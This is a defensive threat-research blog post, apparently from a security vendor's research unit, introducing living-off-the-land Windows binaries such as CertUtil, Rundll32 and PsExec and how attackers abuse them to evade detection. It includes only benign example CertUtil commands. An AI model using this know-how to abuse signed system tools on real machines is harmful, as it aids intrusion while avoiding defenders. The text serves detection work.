LOLBins, short for living off the land binaries, are an integral part of the cybersecurity landscape. Pre-installed on most Windows systems or downloadable from Microsoft, these Microsoft-signed tools are exploited by threat actors to seamlessly blend into regular system activities. This inconspicuous nature makes them challenging to detect, elevating them to a top choice for threat actors across various campaigns.
To accomplish their objectives, threat actors could bring their own custom tooling onto a system to achieve their objectives. However, that comes with its own leaps and hurdles. Transporting tools onto a target system would require a threat actor to get through a variety of security controls, such as endpoint detection and response (EDR) and intrusion detection systems, which are typically tuned to detect that sort of activity. With LOLBins, these tools are already on a system for an actor to abuse in any way they deem fit to accomplish their goals.
Here In the ConnectWise Research Unit (CRU), we have done extensive research into various LOLBins that are actively exploited to ensure that we are able to detect a variety of uses outside their typical bounds. The LOLBas project, which is dedicated to identifying uses of the attack method living off the land binaries and scripts (LOLBas), has done a fantastic job cataloging and writing detection recommendations for many Windows binaries that could have unintended malicious usage, which we heavily draw inspiration from.
In part one of this LOLBins blog series, we will review some of the more prevalent LOLBins that we have observed across various recorded incidents.
LOLBins background
While the forefront of cyberthreats primarily showcases notorious malware, ransomware, and zero-day vulnerabilities, the persistent misuse of legitimate scripts and binaries, traditionally considered benign, remains a significant concern. LOLBins are tools with numerous legitimate applications, yet they also carry a significant risk for abuse. Their ability to perform a wide range of functions provides an attractive attack surface for threat actors to exploit. Many of these functions are crucial for computer systems and networks of all sizes, making it impossible to outright restrict them.
As our threat intelligence research deepens, it’s clear that some LOLBins stand out in their prevalence and utility for cybercriminals compared to others. Powershell.exe, Cmd.exe, and Rundll32.exe are at the forefront of LOLBin usage. These LOLBins are the most used because of their broad functionality and flexibility. In the majority of LOLBin usage, whether benign or malicious, you will observe executables being run with Command Prompt or PowerShell. PowerShell is a versatile scripting platform that seamlessly integrates with .NET, the Windows API, and WMI, excelling in remote operations and file management.
In contrast, CMD specializes in batch processing and launching executables, making it a valuable tool for specific attack chains despite its more limited capabilities compared to PowerShell. The popularity of Rundll32.exe is directly related to its versatile nature. Among other things, this binary can load and execute DLL files, dump processes, and download and execute payloads from the internet—all useful features that make this binary very appealing to threat actors.
Outside of these three common contenders, there are a myriad of other LOLBins that are being used to accomplish various objectives. This report will explore some of the more prevalent yet lesser-known LOLBins witnessed in various incidents perpetrated by threat actors within the systems we monitor. Four LOLBins that have been of particular interest based on recent activity observed in events across our partners are CertUtil, NlTest, PsExec, and Wscript.
CertUtil
Originally designed for viewing and managing certificates, CertUtil is becoming a very popular tool for threat actors. CertUtil has been used to export or delete security certificates and even remotely download payloads. Groups like Volt Typhoon and Double Dragon have been observed using this executable for various objectives.
Typical CertUtil activity should look like this:
C:\Windows\system32\certutil.exe -dump "C:\Program Files\[Dir]\config\xxxx.pem"
Figure 1. Typical CertUtil Dump Activity
certutil.exe -store root [Certificate String]
Figure 2. Typical CertUtil Root Certificate Export Activity
